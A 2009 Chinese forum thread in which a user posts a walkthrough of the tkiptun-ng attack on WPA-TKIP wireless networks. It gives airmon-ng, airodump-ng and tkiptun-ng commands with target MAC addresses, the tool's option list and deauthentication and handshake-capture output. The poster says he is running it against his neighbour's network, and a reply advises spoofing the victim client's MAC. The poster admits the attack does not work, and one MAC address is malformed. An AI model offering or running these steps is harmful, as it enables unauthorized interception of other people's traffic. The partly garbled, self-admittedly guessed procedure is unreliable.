ubnt解决方案
查看: 39829|回复: 86

[原创] tkiptun-ng攻击方法(我已经更新了请看下面)

[复制链接]

80

回帖

590

积分

67 小时

在线时间

中尉

注册时间
2009-1-20
金币
267 个
威望
24 个
荣誉
7 个

尚未签到

发表于 2009-2-27 07:55 |显示全部楼层
本帖最后由 ji8635382 于 2009-3-3 17:59 编辑 ; X# ?* T% S* s0 c. R
4 l0 F3 N/ S5 v$ K2 `! D5 E
ErikTews将在东京的PacSec大会上,演示他是如何在15分钟内破解WPA加密技术的。之前的无线加密技术WEP只需使用当今的笔记本即可在几分钟内破解。EricTews将演示他是如何破解WPA加密技术来读取从路由器传往笔记本的数据。为了读取正在传送的数据,Tews找到了无需用字典攻击法,来破解临时密钥完整性协议(TKIP)的方法。
4 K" i7 s( L6 w# H下面就是进行破解的步骤 我参考国外的论坛写的!
) @3 I/ G9 P+ C首先要具备3点必备的攻击条件! V6 t* d# K6 \! n* I& [3 P/ f
1 客户端和接入点必须使用WPA TKIP 而且客户端必须连接 4 p+ U6 v9 `: d: T1 U% W0 }
2 客户端和接入点必须使用的网络协议地址的IPv4) E3 t' u) w/ L7 Y3 g# Q
3一个长期存在的时间延长键(重新输入间隔)必须设定的接入点。在大多数调制解调器/无线路由器使用TKIP ,这一时期是默认情况下设置为3600秒,从而使攻击
) U- [# b5 q, I/ J8 ?以上3点基本上是没有问题了下面是就是攻击了" T: F3 i6 R: ?& x
airmon-ng a 首先把网卡监视模式打开:输入airmon-ng start wlan0 注意我的网卡端口是wlan0不同的网卡端口都不一样可以用ifconfig -a 进行查看
! P# h8 y) q% a; y0 l输入后出现的内如如下  U! ~8 L: f1 T- r
PID     Name
/ |2 o! y, F/ B" w) B2 |2954    dhcpcd$ M& ~  `& A: m! L

" B. [+ x4 j/ J
7 h3 A& i% \+ n1 E( C, x; AInterface       Chipset         Driver
( M( A" J7 X0 ?5 W% l
3 s! s, Q1 e( m8 f+ ]wlan0           RTL8187         r8187 (monitor mode enabled)
" x6 Z$ H6 }- _4 S- v% B0 e不需要另外安装tkiptun-ng bt3正式版有自带的
( d6 }" v9 P! ]9 t( {# }3 g2楼有最新的aircrack工具里面有带tkiptun-ng工具$ a$ ]5 q% k+ G0 y
介绍下tkiptun-ng工具$ W8 H3 H0 Z9 u1 s5 [0 {
) B/ c3 }1 a# O
Filter options:过滤器的!
6 \7 k0 t1 D# N* {
  L* X3 A) d/ z: K  L7 o1 H      -d dmac   : MAC address, Destination
( B3 `( \1 _! J      -s smac   : MAC address, Source: P2 c/ P* V$ ^) [$ j. ~* i' {
      -m len    : minimum packet length
. w. w0 e9 [  m1 _      -n len    : maximum packet length1 r( U: G  d7 Z( g5 ^; Y; S
      -t tods   : frame control, To      DS bit
) O  c. y! K, z) H+ O      -f fromds : frame control, From    DS bit3 ~. n8 t+ U4 Z
      -D        : disable AP detection% C5 X2 f0 t* Q9 z( g
1 S  _- R5 @" h7 y+ O- n
  Replay options:攻击的!
7 E0 ?! j+ Y& C$ d9 G; F; J
" W4 B& j$ k- |% W" q# w- O4 c      -x nbpps  : number of packets per second4 T6 ^. Y% \# W7 r; J5 i
      -a bssid  : set Access Point MAC address0 A8 }6 T& R5 e0 k! }( M
      -c dmac   : set Destination  MAC address
9 P+ P5 l1 N$ e, r3 W. x      -h smac   : set Source       MAC address
0 ^" o! j2 [2 I9 Q; Q      -F        : choose first matching packet/ d0 t% M6 o8 X) ^, Y  a) l* Y
      -e essid  : set target AP SSID/ M5 J. W7 C2 V2 A
9 p: D/ W) f! V& T; p
  Debug options:调试的!! R" j. s0 Q: \, T
      -K prga   : keystream for continuation/ n& |3 n; s. _" v2 q, D
      -y file   : keystream-file for continuation1 y9 g) t/ s2 d( Z# Z1 V$ d2 y+ u
      -j        : inject FromDS packets
" ~$ k3 I4 i3 P1 P5 J      -P pmk    : pmk for verification/vuln testing* D" I; M' H* B/ o$ a4 A; O% X8 \
      -p psk    : psk to calculate pmk with essid
+ T, y# f4 O6 _' C% ?' u+ ~2 b' `% B2 i7 ?; l5 V. k0 h% B; i: r
  source options:  这个不太清楚 。:)呵呵
2 U& s% M' r  p6 H# T4 x2 x# a5 ?9 T
      -i iface  : capture packets from this interface  u4 x4 I- u2 j9 P  r5 |
      -r file   : extract packets from this pcap file
- Z& c6 e$ G1 u  e* }$ S( `/ d* p
      --help              : Displays this usage screen
" ~" w% Y, f* u4 j0 u; ^' T$ }& ]& Y2 C+ W3 F4 v+ I. ]0 Q
这个使用 airodump-ng -w 1 wlan0 这个就不解释了
6 p& V  y2 X5 U3 f* f# p
, ^! d+ ]& f2 D1 f* W. w我看下图1有一个essid为linksys的ap底下也有正常的客服端 这个我在上面注意已经强调了必需要有。/ w: {- q% X- g' ~) ]( _! S
然后我们在打开一个 shell 下面开始tkiptun-ng的命令  ?6 f5 ?- }8 @7 Z9 w7 a
tkiptun-ng wlan0 -a 00:0C:413:12:81 -h 00:12:F0:6F:ED:38 wlan0 是我的端口 -a 是我们要工具的ap mac地址 使用airodump-ng工具时可以看到 -h 是我们自己的 mac地址用 ifconfig -a 可以查到 记入监视模式要忽略掉后面的0 接着我们可以看到图2的内容我们可以看到图上写着 注入成功 等待信号 拿到握手包 等等的内容% i, x  k% V0 R! R# V! @/ T
最后就等待ARP协议数据包的收集了
4 G" @( x$ L* ]
' c) w5 o+ N' o& }8 F# x1 j8 g以上就是攻击的方式了
6 j8 I% t" c$ B7 Z) k# j
, T' T& A, S9 t
  C4 [* [" a3 J& q9 ^* S" s呵呵我也不知道出了问题还是我遗漏了什么或者可能是我的配置是问题,tkiptun-ng攻击一直在等待数据包气死我了 但是看老外也有成功注入的人希望你们也可以成功    tkiptun-ng还是测试版 我想正式版出来应该可以解决很多问题的! 希望大家对tkiptun-ng能多点关注 wpa的破解是有明天的 哈哈哈哈哈哈哈!!!!!!!!
9 m3 V. F& T, @& B( u% d4 d2 X: @( D
/ A$ V; h) p3 ]# c/ `# _
9 c; K8 l1 V5 k! P+ h& a7 C" v1 x' }7 u+ c4 j

0 {5 L! {) n- \# ~6 }7 U, j  u: r/ {! V

5 w/ \: W* s& q! j
, J: r8 ?6 V; @" [
8 O  Z7 B6 \( r% y- l9 h* g7 J2 Q, l, O$ q" B) m
0 D2 \( `/ |. C& c$ F/ @

+ y& W) o3 z' ~( M/ p4 I
/ ~) X' k2 ~7 y* K% }" `0 n/ H* x% F7 H+ k' l

/ P, Q2 ?' r6 c7 q! m! \! G9 Z5 x# ]1 r, e9 n! y2 w
/ e& y  b: N4 M. `3 [

; N3 U0 n0 b8 E/ ^- H5 s6 n9 _) G7 Z8 q6 N( g0 Q

, L# _" D% _0 E8 K$ D( P. U& L2 b6 Y+ {, ~! {" h+ m) T/ g
) z5 w7 M- R" l
:victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory:
4 R, C, W+ Y6 Q& P% {; [) ~1 x* Q. k3 h4 z& |! Q6 H5 O
底下是新写的哦! 本教程只作参考任何法律责任我一概不负责。) E# {; d+ I8 Y8 k, E& d
3 @+ o# @  K3 h1 p' p2 E' t
2楼有最新的aircrack工具里面有带tkiptun-ng工具
/ `! H& V- c; h( w) u: I2 u: ]) e
- u6 C6 Z1 L4 V忙了一上午回家 还是习惯把bt3打开看看回顾上次做的东西 突然有想到了tkiptun-ng因为用airolib-ng做hash表实在耗时间还有就是我邻居他设的wpa2密码实在厉害我已经给他搞的心力交瘁了,可是我有不想放弃比较我在这密码上耗的时间太多了。好了进入正题
, S2 U- F1 O3 I: j7 B* p7 R* D
) \/ M( k( B3 ?# V; n' O$ q  v! Z打开shell输入airodump-ng -w vicino ath1 这个不解释了看不懂我也没有办法。. j/ _7 `. k; t6 Y: L9 x+ ]2 ~4 \
监视你要破解的wpa-TKIP密码类型的ap记住必需要有客服端的; P" M5 T+ O1 C1 {7 q; E& q
关于底下那朋友说的需要更改mac 其实是不需要的 你输入底下的命令后软件自动更改mac7 y8 _4 M$ K$ F& t2 e1 b1 X/ }
1 tkiptun-ng -h 00:12:F0:6F:ED:38 -a 00:0C:413:12:81-m 80 -n 100 ath1 我用atheros网卡了所以显示ath1监视端口和上面的不一样,因为这次不是用我的华硕本本 今天用hp的!呵呵! -m 是最小数据包长度 -n 是最大数据包长度 我 80 和100比较稳定其他都效果不佳 这个是真对我ath网卡的其他的自己试试。 -h 写客服端的mac
/ V  d& f8 n: s. u* `1 X!输入命令后出后会出现下面结果 图我没有办法给你们看了因为那太电脑还在破解中我是用另外的电脑写的希望你们理解!$ u% t+ @) _, u) ^3 l' ~
Blub 2:38 E6 38 1C 24 15 1C CF# G- O. T% x) g
Blub 1:17 DD 0D 69 1D C3 1F EE; ?' ?" D+ d( `  n
Blub 3:29 31 79 E7 E6 CF 8D 5E    如果一直停留在 等待ARP协议数据包 就重新开始因为一直等就没有用的!
  I$ y9 @5 o+ g14:48:00  Michael Test: Successful(这个意思是测试成功)   看清楚上面的 blub 1 2 3这个是固定的显示一定要和我写的一样才可以成功        这个工具的握手包没法靠攻击得到大家请慢慢的等 自己用aireplay工具的是无用的我已经式过了。 % @9 r0 T. N. i: _2 o; c$ d" |
14:48:00  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 1
( B+ u) Q2 p( E6 S- |& h6 O14:48:00  Found specified AP* ~  M' E- u2 O! H7 i* R
14:48:00  Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 2| 4 ACKs]
. G/ `" s% j) X/ t. E$ d14:48:02  WPA handshake: 00:0C:413:12:81 captured
  \9 K8 @3 D$ W8 `14:48:02  Waiting for an ARP packet coming from the Client...4 i. b$ ?  I4 }
Saving chosen packet in replay_src-1109-144822.cap
4 O5 u8 h! x" G/ _14:48:22  Waiting for an ARP response packet coming from the AP...
8 @( f! f) i/ }+ |4 {8 GSaving chosen packet in replay_src-1109-144822.cap4 U7 g1 P3 h. y4 h/ j
14:48:22  Got the answer!
: L# T: K3 }; _' ~14:48:22  Waiting 5 seconds to let encrypted EAPOL frames pass without interfering.5 B) G, P& t7 |9 \6 X2 _
2 b3 C8 A7 H/ C# l  H
Sent  80 packets, current guess: 37..  看到了吗?和上面的不一样哦!呵呵 现在开始猜密码了,你们有没有注意它写什么发包猜测 也就是说这软件是攻击ap在获取wpa的密码信息 这那我想到破解wep了!呵呵 现在猜了37次了 密码还没出现看来我邻居的密码真的很复杂啊!  9 D& s7 `+ B; p6 x1 d, L

& W3 D. R: s$ g: r% A  ]. z, `; qhirte成员还没有公布正式的方法这些都是乱搞的!在东京大会上是15钟破解而我现在都用了1个小时还没有密码 现在只能等待正式版  
8 t. k5 e$ ~& x3 `7 |    我现在电脑已经猜了58次 还没有出现密码   大家保佑我,如果出现密码会和大家说的 还有一个要注意客服端必需一直在线不然就无法用它攻击了。哎!!~~~~

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x

评分

1

查看全部评分

5778

回帖

3万

积分

1406 小时

在线时间

管理员

超级管理员

推广先锋正义勋章灌水天才

注册时间
2007-2-23
金币
24561 个
威望
53 个
荣誉
6 个
累计签到:476 天
连续签到:0 天
[LV.730]常住居民
发表于 2009-2-27 08:21 |显示全部楼层
http://www.aircrack-ng.orG,这个站被屏蔽了.要用代理才能上了.
回复

使用道具 举报

80

回帖

590

积分

67 小时

在线时间

中尉

注册时间
2009-1-20
金币
267 个
威望
24 个
荣誉
7 个

尚未签到

发表于 2009-2-27 08:36 |显示全部楼层
本帖最后由 ji8635382 于 2009-3-5 08:56 编辑 3 U! s+ j0 \5 p6 p( X( l4 T% S

% U! S9 U6 `$ k我已经做成lzm文件了放进 bt3\modules里面就可以了$ e8 Z4 [7 z; L8 \
. D" C) V$ d9 {# V

" e! s) V2 P; M- x; q# @, t* O( D; @7 b% z# @8 R
23楼的 要等待2个相同的握手包才可以! 我弄了4个握手包才可以继续。 其实可以用别的电脑攻击对方客服端!我就是这样做的 一台电脑进行攻击,另一台电脑收集ARP数据包。 我的密码没有破解出来 软件猜测190后 回复无法发送数据表。哎~~~ * }) w+ c0 i) H) }! F
还是等待正式版的吧! 听说也快了。 具体时间无从得知。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x
回复

使用道具 举报

101

回帖

452

积分

129 小时

在线时间

少尉

注册时间
2008-11-3
金币
332 个
威望
1 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-2-27 10:19 |显示全部楼层
期待中........
回复

使用道具 举报

194

回帖

2035

积分

56 小时

在线时间

少校

注册时间
2009-2-13
金币
1756 个
威望
12 个
荣誉
0 个

尚未签到

发表于 2009-2-27 10:50 |显示全部楼层
好啊!!!!!!!!
回复

使用道具 举报

83

回帖

207

积分

79 小时

在线时间

少尉

注册时间
2008-9-17
金币
113 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-27 12:21 |显示全部楼层
:)好啊!!!!!!!!
回复

使用道具 举报

18

回帖

65

积分

21 小时

在线时间

上等兵

注册时间
2009-2-19
金币
42 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-27 13:19 |显示全部楼层
========================================================
- i8 Z9 P: o9 {& |# w! E1 }1 GGeneral Requirements
% Z+ [" k4 o* e; NBoth the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs.
, C  E! I$ E$ u3 b, a. `! P6 {8 ]& Q9 }" h: q5 b' \" g
The AP must be configured for WPA plus TKIP. ( g3 n2 _3 U1 O- o6 @
) q6 ^5 L" n4 _8 H
A fairly long rekeying time must be in use such as 3600 seconds. It should be at least 20 minutes. 4 T& \) H( ^4 R1 `
' c% B+ u% x$ }9 [# L( k+ i5 A; H4 n
Specific Requirements4 G  ^* w8 W" n) _
The network card MAC address that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking.   y+ h  ~, W. ]  W# K
==================================================
5 |8 E: d! @' T, o
% w5 `- c. B. `4 k( u  b以上是官方网站上的最新解释,楼主似乎没有将自己的网卡MAC Fake 成和合法客户的一样
回复

使用道具 举报

85

回帖

747

积分

106 小时

在线时间

中尉

注册时间
2007-1-11
金币
643 个
威望
1 个
荣誉
0 个
累计签到:18 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-2-27 15:05 |显示全部楼层
有点实际的了
回复

使用道具 举报

76

回帖

230

积分

46 小时

在线时间

少尉

注册时间
2008-9-13
金币
133 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-27 17:04 |显示全部楼层
大家给个能上这个网站的代理吧,thanks
回复

使用道具 举报

80

回帖

590

积分

67 小时

在线时间

中尉

注册时间
2009-1-20
金币
267 个
威望
24 个
荣誉
7 个

尚未签到

发表于 2009-2-28 21:10 |显示全部楼层
本帖最后由 ji8635382 于 2009-2-28 21:29 编辑
6 r" [+ R* d  H+ ]
========================================================
: l2 S2 L/ k! K& _- y9 m9 fGeneral Requirements
+ F) O* h0 |* v6 {- G) T! f" BBoth the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs.
% E2 }- E8 ]+ U
7 v; t: k) S4 V; }The AP must be  ...* B; Y- L# a* ]$ C0 f- X4 p# I
daibi 发表于 2009-2-27 13:19

& ^4 q" u/ c$ [, u1 M& x; E
- e# A- u" d$ n* n& M( a( NSpecific Requirements% g5 |7 j- Z! s  z1 ^( c

8 k1 r0 l+ y) C5 O+ ?network card MAC address that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking) p6 H+ j! l. [, y, e
关于这个特殊要求我还真的没有看到,因为官方保密了许多内容 如破解过程等等都保密了。 楼上的谢谢你了 我现在试试看! 不要字典 不要字典~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~祈祷!!
回复

使用道具 举报

703

回帖

3121

积分

368 小时

在线时间

少校

注册时间
2006-11-1
金币
2158 个
威望
20 个
荣誉
5 个

尚未签到

发表于 2009-2-28 21:17 |显示全部楼层
这东西不顶对不住楼主,严重关注中
回复

使用道具 举报

726

回帖

8639

积分

675 小时

在线时间

中校

注册时间
2009-1-30
金币
7724 个
威望
6 个
荣誉
6 个
累计签到:673 天
连续签到:0 天
[LV.730]常住居民
发表于 2009-2-28 22:21 |显示全部楼层
快了,快了,快了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2025-2-5 14:47

返回顶部 返回列表